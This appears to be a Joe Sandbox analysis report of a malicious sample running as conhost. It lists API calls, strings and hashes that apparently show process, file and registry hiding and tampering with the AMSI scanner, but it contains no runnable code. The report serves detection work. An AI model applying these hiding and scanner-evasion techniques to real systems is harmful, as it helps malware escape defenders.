Part of subcall function 0000013F08E61000: GetProcessHeap.KERNEL32 ref: 0000013F08E61006
Part of subcall function 0000013F08E61000: HeapAlloc.KERNEL32 ref: 0000013F08E61015
Part of subcall function 0000013F08E61000: GetProcessHeap.KERNEL32 ref: 0000013F08E61028
Part of subcall function 0000013F08E61000: HeapAlloc.KERNEL32 ref: 0000013F08E61037

RegOpenKeyExW.ADVAPI32 ref: 0000013F08E617AE
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E617DB
RegCloseKey.ADVAPI32 ref: 0000013F08E617F5
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61815
RegCloseKey.KERNELBASE ref: 0000013F08E61830
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61850
RegCloseKey.ADVAPI32 ref: 0000013F08E6186B
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E6188B
RegCloseKey.ADVAPI32 ref: 0000013F08E618A6
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E618C6
RegCloseKey.ADVAPI32 ref: 0000013F08E618E1
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61901
RegCloseKey.ADVAPI32 ref: 0000013F08E6191C
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E6193C
RegCloseKey.ADVAPI32 ref: 0000013F08E61957
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61977
RegCloseKey.ADVAPI32 ref: 0000013F08E61992
RegCloseKey.ADVAPI32 ref: 0000013F08E6199C

Part of subcall function 0000013F08E612B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000013F08E61315
Part of subcall function 0000013F08E612B8: GetProcessHeap.KERNEL32 ref: 0000013F08E61323
Part of subcall function 0000013F08E612B8: HeapAlloc.KERNEL32 ref: 0000013F08E61334
Part of subcall function 0000013F08E612B8: RegEnumValueW.ADVAPI32 ref: 0000013F08E61393
Part of subcall function 0000013F08E612B8: GetProcessHeap.KERNEL32 ref: 0000013F08E613DB
Part of subcall function 0000013F08E612B8: HeapAlloc.KERNEL32 ref: 0000013F08E613E9
Part of subcall function 0000013F08E612B8: GetProcessHeap.KERNEL32 ref: 0000013F08E61406
Part of subcall function 0000013F08E612B8: HeapFree.KERNEL32 ref: 0000013F08E61414
Part of subcall function 0000013F08E612B8: lstrlenW.KERNEL32 ref: 0000013F08E6141D
Part of subcall function 0000013F08E612B8: GetProcessHeap.KERNEL32 ref: 0000013F08E6142B
Part of subcall function 0000013F08E612B8: HeapAlloc.KERNEL32 ref: 0000013F08E61439

Strings

startup, xrefs: 0000013F08E617D1
service_names, xrefs: 0000013F08E618BF
udp, xrefs: 0000013F08E61970
process_names, xrefs: 0000013F08E61849
tcp_remote, xrefs: 0000013F08E61935
tcp_local, xrefs: 0000013F08E618FA
pid, xrefs: 0000013F08E6180E
SOFTWARE\$rbx-config, xrefs: 0000013F08E6178E
paths, xrefs: 0000013F08E61884

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 54fa3f74439ef84f798580198d0fc9ab576eb874d6da8e014582fcc5289e2ace
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 80712C36B10B50C5EB249FA9E8506D83B66FB85B88F401129FE4D53B2ADF3CC656C341

Function 0000013F08E61E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000013F08E61E7F

Part of subcall function 0000013F08E622A8: GetModuleHandleA.KERNEL32(?,?,?,0000013F08E61EB1), ref: 0000013F08E622C0
Part of subcall function 0000013F08E622A8: GetProcAddress.KERNEL32(?,?,?,0000013F08E61EB1), ref: 0000013F08E622D1

CreateThread.KERNELBASE ref: 0000013F08E62043
TlsAlloc.KERNEL32 ref: 0000013F08E62049
TlsAlloc.KERNEL32 ref: 0000013F08E62055
TlsAlloc.KERNEL32 ref: 0000013F08E62061
TlsAlloc.KERNEL32 ref: 0000013F08E6206D
TlsAlloc.KERNEL32 ref: 0000013F08E62079
TlsAlloc.KERNEL32 ref: 0000013F08E62085

Strings

PdhGetFormattedCounterArrayW, xrefs: 0000013F08E61FF1
EnumServicesStatusExW, xrefs: 0000013F08E61F71, 0000013F08E61F92
NtQueryDirectoryFileEx, xrefs: 0000013F08E61EFC
amsi.dll, xrefs: 0000013F08E62019
sechost.dll, xrefs: 0000013F08E61F99
advapi32.dll, xrefs: 0000013F08E61F57, 0000013F08E61F78
NtEnumerateKey, xrefs: 0000013F08E61F19
NtQueryDirectoryFile, xrefs: 0000013F08E61EDF
ntdll.dll, xrefs: 0000013F08E61E8D
NtQuerySystemInformation, xrefs: 0000013F08E61EA5
pdh.dll, xrefs: 0000013F08E61FD7, 0000013F08E61FF8
PdhGetRawCounterArrayW, xrefs: 0000013F08E61FD0
AmsiScanBuffer, xrefs: 0000013F08E62012
EnumServiceGroupW, xrefs: 0000013F08E61F50
NtEnumerateValueKey, xrefs: 0000013F08E61F36
NtDeviceIoControlFile, xrefs: 0000013F08E61FB6
NtResumeThread, xrefs: 0000013F08E61EC2

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 8d7d6d820c09092ffa059a0511e24e462b8f8990bfdf158d28218ca472cde877
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 905168B0D10A4AA5FA2CEBECEC407D82B26A744385F90453AF509525679E7C836BC387

Function 0000013F08E91E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000013F08E91E7F

Part of subcall function 0000013F08E922A8: GetModuleHandleA.KERNEL32(?,?,?,0000013F08E91EB1), ref: 0000013F08E922C0
Part of subcall function 0000013F08E922A8: GetProcAddress.KERNEL32(?,?,?,0000013F08E91EB1), ref: 0000013F08E922D1

CreateThread.KERNELBASE ref: 0000013F08E92043
TlsAlloc.KERNEL32 ref: 0000013F08E92049
TlsAlloc.KERNEL32 ref: 0000013F08E92055
TlsAlloc.KERNEL32 ref: 0000013F08E92061
TlsAlloc.KERNEL32 ref: 0000013F08E9206D
TlsAlloc.KERNEL32 ref: 0000013F08E92079
TlsAlloc.KERNEL32 ref: 0000013F08E92085

Strings

AmsiScanBuffer, xrefs: 0000013F08E92012
NtQueryDirectoryFileEx, xrefs: 0000013F08E91EFC
NtDeviceIoControlFile, xrefs: 0000013F08E91FB6
NtEnumerateValueKey, xrefs: 0000013F08E91F36
EnumServicesStatusExW, xrefs: 0000013F08E91F71, 0000013F08E91F92
PdhGetFormattedCounterArrayW, xrefs: 0000013F08E91FF1
PdhGetRawCounterArrayW, xrefs: 0000013F08E91FD0
pdh.dll, xrefs: 0000013F08E91FD7, 0000013F08E91FF8
NtQueryDirectoryFile, xrefs: 0000013F08E91EDF
NtResumeThread, xrefs: 0000013F08E91EC2
ntdll.dll, xrefs: 0000013F08E91E8D
EnumServiceGroupW, xrefs: 0000013F08E91F50
NtQuerySystemInformation, xrefs: 0000013F08E91EA5
sechost.dll, xrefs: 0000013F08E91F99
NtEnumerateKey, xrefs: 0000013F08E91F19
advapi32.dll, xrefs: 0000013F08E91F57, 0000013F08E91F78
amsi.dll, xrefs: 0000013F08E92019

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 4794130181559e449b3fbcc2a45ca74c0d3afa12d0cceb7f8bee680c5db1c8ed
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: C051BAB0910A8AB1EB0CEBECEC507D57B22A700B54F90043BF959125679EBC974BC786

Function 0000013F08E61E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000013F08E61E47
GetProcAddress.KERNEL32 ref: 0000013F08E61E57
SleepEx.KERNELBASE ref: 0000013F08E61E67

Strings

amsi.dll, xrefs: 0000013F08E61E40
AmsiScanBuffer, xrefs: 0000013F08E61E50

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 82c22e2fcad5c222025ea9566ac2e4395cb35aaaa951655e601bb812e10937d1
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 3DD06730E11A00D5FA2DAB99EC543D43A63AB64B81FD4043DE50E012A2DE2C875BC342

Function 0000013F08E91E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0000013F08E91E47
GetProcAddress.KERNEL32 ref: 0000013F08E91E57
SleepEx.KERNELBASE ref: 0000013F08E91E67

Strings

AmsiScanBuffer, xrefs: 0000013F08E91E50
amsi.dll, xrefs: 0000013F08E91E40

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 653f5d351c32d8cadf4ad2790a01520cc49c821dda2f5a013474e3e164ef87e6
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: D5D06230E11641E5F90C6BDDDC943E57A636B64F41FD4043DE50A012A2DE6C575BC342

Function 0000013F08E63A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000013F08E63A35
PathFindFileNameW.SHLWAPI ref: 0000013F08E63A44

Part of subcall function 0000013F08E63F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E6272F), ref: 0000013F08E63FA0

Part of subcall function 0000013F08E63EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63EDB
Part of subcall function 0000013F08E63EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F0E
Part of subcall function 0000013F08E63EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F2E
Part of subcall function 0000013F08E63EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F47
Part of subcall function 0000013F08E63EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F68

CreateThread.KERNELBASE ref: 0000013F08E63A8B

Part of subcall function 0000013F08E61E74: GetCurrentThread.KERNEL32 ref: 0000013F08E61E7F
Part of subcall function 0000013F08E61E74: CreateThread.KERNELBASE ref: 0000013F08E62043
Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62049
Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62055
Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62061
Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E6206D
Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62079
Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62085

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 0f85b32534f0a75d91748e2590cd634ccffd720dcef4fe9d5be28feabdf609f3
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: D2112931E2460192FB6CA7E9E9493ED2AA3A7543C5F90413DF406816D3EF7CC7679602

Function 0000013F08E93A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000013F08E93A35
PathFindFileNameW.SHLWAPI ref: 0000013F08E93A44

Part of subcall function 0000013F08E93F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E9272F), ref: 0000013F08E93FA0

Part of subcall function 0000013F08E93EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93EDB
Part of subcall function 0000013F08E93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F0E
Part of subcall function 0000013F08E93EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F2E
Part of subcall function 0000013F08E93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F47
Part of subcall function 0000013F08E93EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F68

CreateThread.KERNELBASE ref: 0000013F08E93A8B

Part of subcall function 0000013F08E91E74: GetCurrentThread.KERNEL32 ref: 0000013F08E91E7F
Part of subcall function 0000013F08E91E74: CreateThread.KERNELBASE ref: 0000013F08E92043
Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92049
Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92055
Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92061
Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E9206D
Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92079
Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92085

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: a54b729f4e76a0ffdd6e9ad0e607cc6e37a7dfe0aa61ea1ff0e55a31d28b59d9
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: D4116135E10681A2F76C97ECA9453D96A93A754765F50103DFC86812D3DFFCC7468602

Function 0000013F081C2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000013F081C302E

Memory Dump Source

Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 9499d148463b0eecc480ed2ad07d584ad4d26eb85b58bf1e9a151cbbf816f1ce
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 4291F672F116508BDB588F29D4007ADBB92FF54B98FA4C138EE6947789DA34D913C710

Function 0000013F08E61BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000013F08E61724: GetProcessHeap.KERNEL32 ref: 0000013F08E6172F
Part of subcall function 0000013F08E61724: HeapAlloc.KERNEL32 ref: 0000013F08E6173E
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E617AE
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E617DB
Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E617F5
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61815
Part of subcall function 0000013F08E61724: RegCloseKey.KERNELBASE ref: 0000013F08E61830
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61850
Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E6186B
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E6188B
Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E618A6
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E618C6

SleepEx.KERNELBASE ref: 0000013F08E61BDF

Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E618E1
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61901
Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E6191C
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E6193C
Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E61957
Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61977
Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E61992
Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E6199C

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 05d309dc4b1016f937ccac57fb3bef7129eb2162d3918dfb3cc06758192d337f
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 5B313075A0064191FB5E9BAFD5503ED7BA6AB44BC0F044839FE0987297DE1CCA73820B

Function 0000013F08E91BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000013F08E91724: GetProcessHeap.KERNEL32 ref: 0000013F08E9172F
Part of subcall function 0000013F08E91724: HeapAlloc.KERNEL32 ref: 0000013F08E9173E
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E917AE
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E917DB
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E917F5
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91815
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E91830
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91850
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E9186B
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E9188B
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E918A6
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E918C6

SleepEx.KERNELBASE ref: 0000013F08E91BDF

Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E918E1
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91901
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E9191C
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E9193C
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E91957
Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91977
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E91992
Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E9199C

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 681476998691bf9496b3bf02fb01726263ff9e368a159aaf3cb5bf1ccd39cabc
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 13317875A0068391FB5C9BAED5413E93BA7A744BC0F140439FE8983397DE9CCA52820F

Non-executed Functions

Function 0000013F08E62FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000013F08E63094
lstrlenW.KERNEL32 ref: 0000013F08E632BE

Part of subcall function 0000013F08E61A30: OpenProcess.KERNEL32 ref: 0000013F08E61A56
